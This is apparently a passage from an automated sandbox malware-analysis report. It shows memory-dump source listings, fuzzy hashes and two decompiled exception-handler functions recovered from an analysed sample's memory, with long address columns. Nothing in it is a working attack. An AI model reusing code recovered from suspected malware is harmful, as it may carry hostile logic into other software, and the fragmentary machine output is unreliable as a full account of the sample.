                                                                                                                                                                                                                                                            0x0487b38f
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b38f
                                                                                                                                                                                                                                                            0x0487b3b7
                                                                                                                                                                                                                                                            0x0487b3b9
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b3c9
                                                                                                                                                                                                                                                            0x0487b3cb
                                                                                                                                                                                                                                                            0x0487b3cd
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b3d3
                                                                                                                                                                                                                                                            0x0487b3da
                                                                                                                                                                                                                                                            0x0487b406
                                                                                                                                                                                                                                                            0x0487b406
                                                                                                                                                                                                                                                            0x0487b408
                                                                                                                                                                                                                                                            0x0487b40a
                                                                                                                                                                                                                                                            0x0487b41e
                                                                                                                                                                                                                                                            0x0487b420
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b40c
                                                                                                                                                                                                                                                            0x0487b40c
                                                                                                                                                                                                                                                            0x0487b40c
                                                                                                                                                                                                                                                            0x0487b415
                                                                                                                                                                                                                                                            0x0487b416
                                                                                                                                                                                                                                                            0x0487b418
                                                                                                                                                                                                                                                            0x0487b41a
                                                                                                                                                                                                                                                            0x0487b41a
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b40c
                                                                                                                                                                                                                                                            0x0487b3dc
                                                                                                                                                                                                                                                            0x0487b3dc
                                                                                                                                                                                                                                                            0x0487b3df
                                                                                                                                                                                                                                                            0x0487b3e1
                                                                                                                                                                                                                                                            0x0487b3f3
                                                                                                                                                                                                                                                            0x0487b3f3
                                                                                                                                                                                                                                                            0x0487b3f6
                                                                                                                                                                                                                                                            0x0487b3f8
                                                                                                                                                                                                                                                            0x0487b3f8
                                                                                                                                                                                                                                                            0x0487b3f9
                                                                                                                                                                                                                                                            0x0487b3f9
                                                                                                                                                                                                                                                            0x0487b3ff
                                                                                                                                                                                                                                                            0x0487b3ff
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b3e3
                                                                                                                                                                                                                                                            0x0487b3e3
                                                                                                                                                                                                                                                            0x0487b3e3
                                                                                                                                                                                                                                                            0x0487b3ea
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b3ec
                                                                                                                                                                                                                                                            0x0487b3ec
                                                                                                                                                                                                                                                            0x0487b3ed
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b3ed
                                                                                                                                                                                                                                                            0x0487b3ef
                                                                                                                                                                                                                                                            0x0487b3f1
                                                                                                                                                                                                                                                            0x0487b404
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b404
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b3f1
                                                                                                                                                                                                                                                            0x0487b363
                                                                                                                                                                                                                                                            0x0487b366
                                                                                                                                                                                                                                                            0x0487b369
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b36b
                                                                                                                                                                                                                                                            0x0487b36d
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b36d
                                                                                                                                                                                                                                                            0x0487b332
                                                                                                                                                                                                                                                            0x0487b334
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 0487B3A2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2850889275-0
                                                                                                                                                                                                                                                            • Opcode ID: 37ba07f377a1b7933eedf4042d080c669f0451e4eb60fde65c168df33d10d4c7
                                                                                                                                                                                                                                                            • Instruction ID: a8e2e35635024f24f84a0ad9ee82e53be3a94bfd7b66b0e03a313174a912b9c3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37ba07f377a1b7933eedf4042d080c669f0451e4eb60fde65c168df33d10d4c7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D619031640605DFEB258E2DC8B466973E3EB8531CF248F69DA16CB294E774F8828744
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036621865.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: t32c
                                                                                                                                                                                                                                                            • API String ID: 0-3674199949
                                                                                                                                                                                                                                                            • Opcode ID: 2f36a44b806fc9b612f07f8acce3fb94fc12dca1ffe46f9723202dbb237cf3e5
                                                                                                                                                                                                                                                            • Instruction ID: fc4ae1a928b946af536ec3022d9c8108a652841fe800ec99d2d25d3745d22c46
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f36a44b806fc9b612f07f8acce3fb94fc12dca1ffe46f9723202dbb237cf3e5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67D1D276A0021DEFDF24CB94CC80BAAB7B5FF88314F149295D619A7216D330AE85DF51
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036621865.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 0a72c124759d5cd4190c8eb6609feb3ee02408d8579778226033a5eef40a9a90
                                                                                                                                                                                                                                                            • Instruction ID: 84b06c8e48afcf8a61d59453d403e4cdeb87868ba479f03751167d6c348351b2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a72c124759d5cd4190c8eb6609feb3ee02408d8579778226033a5eef40a9a90
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D411672A0121DDFDF20CF44C880BA9B7B5FB88318F59A594DA496B216D330AE85DF91
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036621865.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 497882d481e652088345ce9735b387487abcf5625144e27143c9d857c1990d4b
                                                                                                                                                                                                                                                            • Instruction ID: 7851e86f21a6b463c0e37f695c71b9d34744a45439dea7c0e24eb7045f6068d7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 497882d481e652088345ce9735b387487abcf5625144e27143c9d857c1990d4b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69315B76A00219DFDF24CF58C880BA9B7B5FF88724F199594DA496B216D370EE80CF90
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 71%
                                                                                                                                                                                                                                                            			E004020A4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                                                            				signed int* _t43;
                                                                                                                                                                                                                                                            				char _t44;
                                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                                            				intOrPtr* _t53;
                                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                                            				void* _t65;
                                                                                                                                                                                                                                                            				long _t66;
                                                                                                                                                                                                                                                            				signed int* _t80;
                                                                                                                                                                                                                                                            				signed int* _t82;
                                                                                                                                                                                                                                                            				void* _t84;
                                                                                                                                                                                                                                                            				signed int _t86;
                                                                                                                                                                                                                                                            				void* _t89;
                                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                                                            				void* _t99;
                                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t43 = _t84;
                                                                                                                                                                                                                                                            				_t65 = __ebx + 2;
                                                                                                                                                                                                                                                            				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                                                                            				_t89 = _t95;
                                                                                                                                                                                                                                                            				_t96 = _t95 - 8;
                                                                                                                                                                                                                                                            				_push(_t65);
                                                                                                                                                                                                                                                            				_push(_t84);
                                                                                                                                                                                                                                                            				_push(_t89);
                                                                                                                                                                                                                                                            				asm("cld");
                                                                                                                                                                                                                                                            				_t66 = _a8;
                                                                                                                                                                                                                                                            				_t44 = _a4;
                                                                                                                                                                                                                                                            				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                                                                                            					_push(_t89);
                                                                                                                                                                                                                                                            					E0040220B(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                                                                                            					_t46 = 1;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_v12 = _t44;
                                                                                                                                                                                                                                                            					_v8 = _a12;
                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                                                                                            					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                                                                                            					_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                            					_t49 = E004022C5(_t66);
                                                                                                                                                                                                                                                            					_t99 = _t96 + 4;
                                                                                                                                                                                                                                                            					if(_t49 == 0) {
                                                                                                                                                                                                                                                            						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						while(_t86 != 0xffffffff) {
                                                                                                                                                                                                                                                            							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                                                                                            							if(_t53 == 0) {
                                                                                                                                                                                                                                                            								L8:
                                                                                                                                                                                                                                                            								_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                            								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								_t54 =  *_t53();
                                                                                                                                                                                                                                                            								_t89 = _t89;
                                                                                                                                                                                                                                                            								_t86 = _t86;
                                                                                                                                                                                                                                                            								_t66 = _a8;
                                                                                                                                                                                                                                                            								_t55 = _t54;
                                                                                                                                                                                                                                                            								_t106 = _t54;
                                                                                                                                                                                                                                                            								if(_t106 == 0) {
                                                                                                                                                                                                                                                            									goto L8;
                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                            									if(_t106 < 0) {
                                                                                                                                                                                                                                                            										_t46 = 0;
                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                            										_t82 =  *(_t66 + 8);
                                                                                                                                                                                                                                                            										E004021B0(_t55, _t66);
                                                                                                                                                                                                                                                            										_t89 = _t66 + 0x10;
                                                                                                                                                                                                                                                            										E0040220B(_t89, _t66, 0);
                                                                                                                                                                                                                                                            										_t99 = _t99 + 0xc;
                                                                                                                                                                                                                                                            										E004022A7(_t82[2], 1);
                                                                                                                                                                                                                                                            										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                                                                                            										_t66 = 0;
                                                                                                                                                                                                                                                            										_t86 = 0;
                                                                                                                                                                                                                                                            										 *(_t82[2])();
                                                                                                                                                                                                                                                            										goto L8;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                                            						_t46 = 1;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				L13:
                                                                                                                                                                                                                                                            				return _t46;
                                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                                            0x004020a8
                                                                                                                                                                                                                                                            0x004020a9
                                                                                                                                                                                                                                                            0x004020aa
                                                                                                                                                                                                                                                            0x004020ad
                                                                                                                                                                                                                                                            0x004020af
                                                                                                                                                                                                                                                            0x004020b2
                                                                                                                                                                                                                                                            0x004020b3
                                                                                                                                                                                                                                                            0x004020b5
                                                                                                                                                                                                                                                            0x004020b6
                                                                                                                                                                                                                                                            0x004020b7
                                                                                                                                                                                                                                                            0x004020ba
                                                                                                                                                                                                                                                            0x004020c4
                                                                                                                                                                                                                                                            0x00402175
                                                                                                                                                                                                                                                            0x0040217c
                                                                                                                                                                                                                                                            0x00402185
                                                                                                                                                                                                                                                            0x004020ca
                                                                                                                                                                                                                                                            0x004020ca
                                                                                                                                                                                                                                                            0x004020d0
                                                                                                                                                                                                                                                            0x004020d6
                                                                                                                                                                                                                                                            0x004020d9
                                                                                                                                                                                                                                                            0x004020dc
                                                                                                                                                                                                                                                            0x004020e0
                                                                                                                                                                                                                                                            0x004020e5
                                                                                                                                                                                                                                                            0x004020ea
                                                                                                                                                                                                                                                            0x0040216a
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004020ec
                                                                                                                                                                                                                                                            0x004020ec
                                                                                                                                                                                                                                                            0x004020f8
                                                                                                                                                                                                                                                            0x004020fa
                                                                                                                                                                                                                                                            0x00402155
                                                                                                                                                                                                                                                            0x00402155
                                                                                                                                                                                                                                                            0x0040215b
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004020fc
                                                                                                                                                                                                                                                            0x0040210b
                                                                                                                                                                                                                                                            0x0040210d
                                                                                                                                                                                                                                                            0x0040210e
                                                                                                                                                                                                                                                            0x0040210f
                                                                                                                                                                                                                                                            0x00402112
                                                                                                                                                                                                                                                            0x00402112
                                                                                                                                                                                                                                                            0x00402114
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00402116
                                                                                                                                                                                                                                                            0x00402116
                                                                                                                                                                                                                                                            0x00402160
                                                                                                                                                                                                                                                            0x00402118
                                                                                                                                                                                                                                                            0x00402118
                                                                                                                                                                                                                                                            0x0040211c
                                                                                                                                                                                                                                                            0x00402124
                                                                                                                                                                                                                                                            0x00402129
                                                                                                                                                                                                                                                            0x0040212e
                                                                                                                                                                                                                                                            0x0040213a
                                                                                                                                                                                                                                                            0x00402142
                                                                                                                                                                                                                                                            0x00402149
                                                                                                                                                                                                                                                            0x0040214f
                                                                                                                                                                                                                                                            0x00402153
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00402153
                                                                                                                                                                                                                                                            0x00402116
                                                                                                                                                                                                                                                            0x00402114
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004020fa
                                                                                                                                                                                                                                                            0x0040216e
                                                                                                                                                                                                                                                            0x0040216e
                                                                                                                                                                                                                                                            0x0040216e
                                                                                                                                                                                                                                                            0x004020ea
                                                                                                                                                                                                                                                            0x0040218a
                                                                                                                                                                                                                                                            0x00402191

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036254659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1036280390.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                                                            • Instruction ID: 5f91f98417def904e3f4674b05dcf66d9153a90ec151369bdc69b2da32941638
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE21D832900204ABCB10EF69CDC89ABB7A5FF48350B4581BAED15AB2C5D774FA15C7E0
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 71%
                                                                                                                                                                                                                                                            			E0487B0CC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                                                            				signed int* _t43;
                                                                                                                                                                                                                                                            				char _t44;
                                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                                            				intOrPtr* _t53;
                                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                                            				void* _t65;
                                                                                                                                                                                                                                                            				long _t66;
                                                                                                                                                                                                                                                            				signed int* _t80;
                                                                                                                                                                                                                                                            				signed int* _t82;
                                                                                                                                                                                                                                                            				void* _t84;
                                                                                                                                                                                                                                                            				signed int _t86;
                                                                                                                                                                                                                                                            				void* _t89;
                                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                                                            				void* _t99;
                                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t43 = _t84;
                                                                                                                                                                                                                                                            				_t65 = __ebx + 2;
                                                                                                                                                                                                                                                            				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                                                                            				_t89 = _t95;
                                                                                                                                                                                                                                                            				_t96 = _t95 - 8;
                                                                                                                                                                                                                                                            				_push(_t65);
                                                                                                                                                                                                                                                            				_push(_t84);
                                                                                                                                                                                                                                                            				_push(_t89);
                                                                                                                                                                                                                                                            				asm("cld");
                                                                                                                                                                                                                                                            				_t66 = _a8;
                                                                                                                                                                                                                                                            				_t44 = _a4;
                                                                                                                                                                                                                                                            				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                                                                                            					_push(_t89);
                                                                                                                                                                                                                                                            					E0487B237(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                                                                                            					_t46 = 1;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_v12 = _t44;
                                                                                                                                                                                                                                                            					_v8 = _a12;
                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                                                                                            					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                                                                                            					_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                            					_t49 = E0487B2F1(_t66);
                                                                                                                                                                                                                                                            					_t99 = _t96 + 4;
                                                                                                                                                                                                                                                            					if(_t49 == 0) {
                                                                                                                                                                                                                                                            						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						while(_t86 != 0xffffffff) {
                                                                                                                                                                                                                                                            							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                                                                                            							if(_t53 == 0) {
                                                                                                                                                                                                                                                            								L8:
                                                                                                                                                                                                                                                            								_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                            								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								_t54 =  *_t53();
                                                                                                                                                                                                                                                            								_t89 = _t89;
                                                                                                                                                                                                                                                            								_t86 = _t86;
                                                                                                                                                                                                                                                            								_t66 = _a8;
                                                                                                                                                                                                                                                            								_t55 = _t54;
                                                                                                                                                                                                                                                            								_t106 = _t54;
                                                                                                                                                                                                                                                            								if(_t106 == 0) {
                                                                                                                                                                                                                                                            									goto L8;
                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                            									if(_t106 < 0) {
                                                                                                                                                                                                                                                            										_t46 = 0;
                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                            										_t82 =  *(_t66 + 8);
                                                                                                                                                                                                                                                            										E0487B1DC(_t55, _t66);
                                                                                                                                                                                                                                                            										_t89 = _t66 + 0x10;
                                                                                                                                                                                                                                                            										E0487B237(_t89, _t66, 0);
                                                                                                                                                                                                                                                            										_t99 = _t99 + 0xc;
                                                                                                                                                                                                                                                            										E0487B2D3(_t82[2]);
                                                                                                                                                                                                                                                            										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                                                                                            										_t66 = 0;
                                                                                                                                                                                                                                                            										_t86 = 0;
                                                                                                                                                                                                                                                            										 *(_t82[2])(1);
                                                                                                                                                                                                                                                            										goto L8;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                                            						_t46 = 1;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				L13:
                                                                                                                                                                                                                                                            				return _t46;
                                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                                            0x0487b0d0
                                                                                                                                                                                                                                                            0x0487b0d1
                                                                                                                                                                                                                                                            0x0487b0d2
                                                                                                                                                                                                                                                            0x0487b0d5
                                                                                                                                                                                                                                                            0x0487b0d7
                                                                                                                                                                                                                                                            0x0487b0da
                                                                                                                                                                                                                                                            0x0487b0db
                                                                                                                                                                                                                                                            0x0487b0dd
                                                                                                                                                                                                                                                            0x0487b0de
                                                                                                                                                                                                                                                            0x0487b0df
                                                                                                                                                                                                                                                            0x0487b0e2
                                                                                                                                                                                                                                                            0x0487b0ec
                                                                                                                                                                                                                                                            0x0487b19d
                                                                                                                                                                                                                                                            0x0487b1a4
                                                                                                                                                                                                                                                            0x0487b1ad
                                                                                                                                                                                                                                                            0x0487b0f2
                                                                                                                                                                                                                                                            0x0487b0f2
                                                                                                                                                                                                                                                            0x0487b0f8
                                                                                                                                                                                                                                                            0x0487b0fe
                                                                                                                                                                                                                                                            0x0487b101
                                                                                                                                                                                                                                                            0x0487b104
                                                                                                                                                                                                                                                            0x0487b108
                                                                                                                                                                                                                                                            0x0487b10d
                                                                                                                                                                                                                                                            0x0487b112
                                                                                                                                                                                                                                                            0x0487b192
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b114
                                                                                                                                                                                                                                                            0x0487b114
                                                                                                                                                                                                                                                            0x0487b120
                                                                                                                                                                                                                                                            0x0487b122
                                                                                                                                                                                                                                                            0x0487b17d
                                                                                                                                                                                                                                                            0x0487b17d
                                                                                                                                                                                                                                                            0x0487b183
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b124
                                                                                                                                                                                                                                                            0x0487b133
                                                                                                                                                                                                                                                            0x0487b135
                                                                                                                                                                                                                                                            0x0487b136
                                                                                                                                                                                                                                                            0x0487b137
                                                                                                                                                                                                                                                            0x0487b13a
                                                                                                                                                                                                                                                            0x0487b13a
                                                                                                                                                                                                                                                            0x0487b13c
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b13e
                                                                                                                                                                                                                                                            0x0487b13e
                                                                                                                                                                                                                                                            0x0487b188
                                                                                                                                                                                                                                                            0x0487b140
                                                                                                                                                                                                                                                            0x0487b140
                                                                                                                                                                                                                                                            0x0487b144
                                                                                                                                                                                                                                                            0x0487b14c
                                                                                                                                                                                                                                                            0x0487b151
                                                                                                                                                                                                                                                            0x0487b156
                                                                                                                                                                                                                                                            0x0487b162
                                                                                                                                                                                                                                                            0x0487b16a
                                                                                                                                                                                                                                                            0x0487b171
                                                                                                                                                                                                                                                            0x0487b177
                                                                                                                                                                                                                                                            0x0487b17b
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b17b
                                                                                                                                                                                                                                                            0x0487b13e
                                                                                                                                                                                                                                                            0x0487b13c
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487b122
                                                                                                                                                                                                                                                            0x0487b196
                                                                                                                                                                                                                                                            0x0487b196
                                                                                                                                                                                                                                                            0x0487b196
                                                                                                                                                                                                                                                            0x0487b112
                                                                                                                                                                                                                                                            0x0487b1b2
                                                                                                                                                                                                                                                            0x0487b1b9

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                                                                                                                                            • Instruction ID: db902ebb5d3e98cc22172ac7912af4c9dcc53666bddff62e4d3c24f091e77771
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A321D8729002049FDB10DF68C8D09ABB7A6FF45354B458A68D915DB249D730F915CBF0
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036621865.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: f53636ae0514ae0dd100b3de5c6df6e14ae4248a0b863b93599089badf196dbd
                                                                                                                                                                                                                                                            • Instruction ID: 40fe03f62e9180a729f98a14fcf8f5b89e4300930f52ea04a22da29643aa0c44
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f53636ae0514ae0dd100b3de5c6df6e14ae4248a0b863b93599089badf196dbd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A311776A0121DCFDF20CF54C880BA9B7B1FB88328F55A594CA596B216D330EE85CF91
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
